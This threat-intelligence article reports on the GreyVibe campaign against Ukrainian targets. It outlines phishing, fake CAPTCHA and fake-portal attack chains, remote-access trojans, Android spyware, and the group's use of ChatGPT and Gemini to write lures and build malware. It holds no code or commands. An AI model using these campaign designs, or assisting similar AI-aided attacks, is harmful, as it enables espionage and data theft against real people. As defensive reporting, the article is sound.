GreyVibe hackers use ChatGPT, Gemini to power cyberattacks

GreyVibe: AI-Augmented Cyber Espionage Campaigns

OverviewA Russian-speaking threat group observed under the moniker GreyVibe has been leveraging artificial intelligence to design convincing lures and to power a suite of custom malware tools. The operation appears to have been active since at least August 2025 and shows a clear focus on Ukrainian or Ukraine-related organizations across military, government, civilian, and business sectors. While researchers note that the activity aligns with Russian state interests, there is no definitive classification of GreyVibe as a formal nation-state operation. The campaign was uncovered by WithSecure, which highlights a sophisticated use of AI-generated content to support social engineering and operational tooling.

Threat Landscape and AttributionGreyVibe is characterized by a blend of state-aligned objectives and possible cybercriminal elements. Key indicators include:

• Language cues in malware panels and code comments consistent with Russian-speaking actors.
• C2 timing configured to Moscow time (UTC+3), reinforcing the link to Russian-speaking operators.
• Observed use of both cyber-espionage tooling and previously used cybercriminal infrastructure, suggesting a hybrid or evolving lineage.
• Suspected ties to former cybercriminal communities through development artifacts such as ISO builders associated with TrickBot remnants.
• Public sharing of development and test samples on scanning platforms, which is atypical for strictly nation-state operations.

Attack Chains: How GreyVibe Adapts and DeliversThe campaign employs multiple interlocking attack chains designed to mislead targets and compromise endpoints. Notable chains include:

PhantomMail

• Spear-phishing emails delivering malicious ZIP or RAR archives.
• Delivery channels include Google Drive and 4sync links.
• Lures present decoy PDFs or fake error messages to entice recipients into opening the payload.
• Targeted impersonations span Ukrainian government, emergency services, telecoms, and energy sectors.

PhantomClick

• Fake CAPTCHA or ClickFix pages designed to resemble legitimate verification prompts.
• Disguised sites mimic Zoom and LAPAS portals.
• Victims are coaxed into executing self-infecting commands via faux Cloudflare verification prompts.

PrincessClub

• Fake Ukrainian adult and dating sites used as initial access points.
• Distribution of FallSpy Android spyware and Windows payloads (PhantomRelay/LegionRelay).
• Operators exploited fake female Telegram personas to establish trust and may have added WebRTC-based live calls to capture audio and video.
• Involves cross-platform operation, with Android and Windows components in tandem.

DroneLink

• Fake Ukrainian military charity sites themed around FPV (first-person view) drones and UAVs.
• Shared infrastructure and tooling with PrincessClub campaigns to streamline execution.

Nebo

• Fake “СПО НЕБО” Russian military login pages crafted to trick Ukrainian military personnel.
• Aimed at convincing victims they were accessing a legitimate Russian military terminal.

AI Tools and Content ProductionGreyVibe distinguishes itself by using advanced AI to craft highly realistic content and to generate operational payloads. The tools cited include:

• ChatGPT, Ideogram AI, and Google Gemini used to generate detailed lure content and assist with tool development.
• Custom obfuscators such as LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, likely built with AI-assisted guidance to evade detection and complicate analysis.
• AI-assisted development of a PowerShell-based remote access trojan named LegionRelay, enabling a broad range of data exfiltration and control functions.

LegionRelay and PhantomRelay: Malware RolesLegionRelay

• A PowerShell-based remote access Trojan (RAT) with multi-faceted capabilities.
• Functions include file theft, screenshots, browser credential theft, exfiltration of Telegram and WhatsApp data, and the setup of RDP access.
• Demonstrates integration with AI-assisted tooling for development and perhaps obfuscation.

PhantomRelay

• Another PowerShell-based RAT with advanced features.
• Supports system fingerprinting, dynamic script loading, and execution of PowerShell and Windows commands.
• Used to extend control over infected hosts and facilitate further exploitation.

FallSpy Android Spyware

• Deployed in PrincessClub and Nebo campaigns.
• Purely focused on intelligence gathering: contacts, call logs, device and network information, location data, media, and SIM data.
• Reflects a broader trend of targeting mobile devices to complement Windows infections.

Campaign Artifacts and Visual CuesThe operation includes visual indicators such as LLM markers embedded in images used by GreyVibe. These markers accompany malware artifacts and are part of the broader toolkit that leverages AI-generated content for deception and branding. The campaign’s images, code comments, and UI motifs reinforce the perception of legitimacy around the fake services and portals.

Evidence of Hybridization and Operational NuancesWithSecure notes that GreyVibe’s activity resembles a nation-state operation in some respects but falls short of the hallmark sophistication and discipline observed in mature state-backed campaigns. The presence of cybercriminal traits—such as early test samples, public artifact uploads, and a cryptocurrency miner deployed on some victims—suggests a hybrid model where state-aligned objectives coexist with criminal methods and personnel. The ISO-building artifact associated with UAC-0098 and the use of mixed infrastructure point to a possible absorption of former cybercriminals into a state-directed tasking framework, or at least a collaboration across disparate groups.

Organizational Footprint and Targeted SectorsThe targeted ecosystem encompasses military, government, civilian, and business sectors relevant to national security and strategic infrastructure. The Ukrainian context is prominent, with multiple campaign components explicitly referencing Ukrainian institutions and narratives. The breadth of tools and lures indicates a coordinated effort to maximize reach while maintaining plausible deniability through multilingual content and varied delivery mechanisms.

Indicators of Compromise: What Researchers Observe

• AI-generated lure content and realistic decoys designed to bypass suspicion.
• A mix of Windows and Android payloads deployed via social engineering channels.
• Lures and payloads aligned with Ukrainian-related themes and geopolitical narratives.
• Malware panels, comments, and C2 configurations in languages consistent with Russian-speaking actors.
• C2 timing aligned to Moscow time (UTC+3).
• Presence of legacy tools and artifacts linked to known groups or incidents (e.g., TrickBot-associated components).

Conclusion: A Complex, Evolving Threat LandscapeGreyVibe presents a multi-faceted threat that blends AI-assisted social engineering, custom malware tooling, and hybrid criminal-state characteristics. The campaign demonstrates a sophisticated approach to deception, with AI used not only to automate content generation but also to support tool development and obfuscation. While attribution to a formal nation-state operation remains a matter of interpretation, the activity clearly targets Ukrainian-related entities and reflects a strategic intent consistent with broader geopolitical tensions in the region. The namespace of campaigns—PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo—highlights the depth of planning and the willingness to employ diverse delivery channels, from fake portals to Android spyware, to achieve reconnaissance and data exfiltration objectives.